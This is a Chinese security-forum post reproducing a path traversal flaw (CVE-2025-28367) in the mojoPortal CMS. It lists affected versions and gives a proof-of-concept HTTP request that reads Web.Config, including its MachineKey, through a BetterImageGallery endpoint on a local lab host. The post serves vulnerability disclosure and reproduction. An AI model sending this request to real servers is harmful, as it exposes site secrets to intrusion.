【成功复现】MojoPortal路径遍历漏洞(CVE-2025-28367)-网络安全论坛-网络安全-阻击者联盟

【成功复现】MojoPortal路径遍历漏洞(CVE-2025-28367)

d2b5ca33bd20250812083710

mojoPortal是美国Joe Audette个人开发者的一套开源的、面向对象的网站架构(WSF)和内容管理系统(CMS)。该系统提供事件日历、相册、文件管理器等。

mojoPortal 2.9.0.1及之前版本存在安全漏洞,该漏洞源于BetterImageGallery API Controller中的ImageHandler Action容易受到目录遍历攻击,可能导致获取Web.Config文件中的MachineKey。

Image
0x02影响版本

mojoPortal 2.9.0.1及之前版本

d2b5ca33bd20250812083720

0x03漏洞复现

1.访问漏洞环境

d2b5ca33bd20250812083730

2.对漏洞进行复现

 POC 

漏洞复现

GET /api/BetterImageGallery/imagehandler?path=../../../Web.Config HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

d2b5ca33bd20250812083746

 

请登录后发表评论

    没有回复内容